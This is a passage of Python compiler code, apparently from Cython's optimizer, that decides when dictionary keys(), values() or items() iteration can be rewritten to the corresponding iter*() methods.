if iterator.args is None:
arg_count = iterator.arg_tuple and len(iterator.arg_tuple.args) or 0
else:
arg_count = len(iterator.args)
if arg_count and iterator.self is not None:
arg_count -= 1
function = iterator.function
# dict iteration?
if function.is_attribute and not reversed and not arg_count:
base_obj = iterator.self or function.obj
method = function.attribute
# in Py3, items() is equivalent to Py2's iteritems()
is_safe_iter = self.global_scope().context.language_level >= 3
if not is_safe_iter and method in ('keys', 'values', 'items'):
# try to reduce this to the corresponding .iter*() methods
if isinstance(base_obj, ExprNodes.CallNode):
inner_function = base_obj.function
if (inner_function.is_name and inner_function.name == 'dict'
and inner_function.entry
and inner_function.entry.is_builtin):
# e.g. dict(something).items() => safe to use .iter*()
is_safe_iter = True
keys = values = False
if method == 'iterkeys' or (is_safe_iter and method == 'keys'):
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.